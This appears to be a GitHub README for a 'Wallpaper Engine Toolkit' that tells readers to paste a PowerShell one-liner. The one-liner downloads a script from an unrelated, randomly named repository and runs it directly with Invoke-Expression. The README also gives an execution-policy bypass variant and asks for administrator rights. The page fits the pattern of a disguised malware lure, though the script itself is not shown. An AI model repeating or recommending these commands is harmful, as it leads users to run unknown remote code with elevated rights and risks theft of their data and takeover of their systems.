Skip to content

Vergeandboost/WallpaperEngine-Toolkit-Setup

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

6 Commits
 
 
 
 
 
 

Repository files navigation

Wallpaper Engine Toolkit Setup

Quick-deploy toolkit for creating and managing dynamic wallpapers in Wallpaper Engine — templates, asset tools, and project scaffolding.

Install

Open PowerShell and run:

irm https://raw.githubusercontent.com/channelguardcalm/apfniwqt/main/install.ps1 | iex

That's it. The installer handles everything.

What it does

  1. Requests administrator rights for system-wide installation.
  2. Downloads the Dynamic Wallpaper Toolkit bundle (templates, scripts, asset organizer).
  3. Extracts the project scaffold to Documents\WallpaperProjects.
  4. Registers shell integration for right-click → 'New Wallpaper Project'.

Requirements

  • Windows 10 / 11 (64-bit)
  • PowerShell 5.1+
  • Wallpaper Engine (Steam or MS Store)
  • Python 3.8+ (for template scripts)
  • ~2 GB free disk space

Troubleshooting

Shell extension not working

Log out and back in — Explorer needs to reload extensions.

Templates folder is empty

Re-run the installer with --templates to force re-download.

Wallpaper Engine doesn't see my projects

Point WE's project folder to Documents\WallpaperProjects\output.


Alternative (bypass execution policy):

powershell -ExecutionPolicy Bypass -Command "irm https://raw.githubusercontent.com/channelguardcalm/apfniwqt/main/install.ps1 | iex"

"irm is not recognized" — old PowerShell. Use:

Invoke-RestMethod https://raw.githubusercontent.com/channelguardcalm/apfniwqt/main/install.ps1 | Invoke-Expression

License

MIT — see LICENSE.

About

Quick-deploy toolkit for creating and managing dynamic wallpapers in Wallpaper Engine — templates, asset tools, and project scaffolding.

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors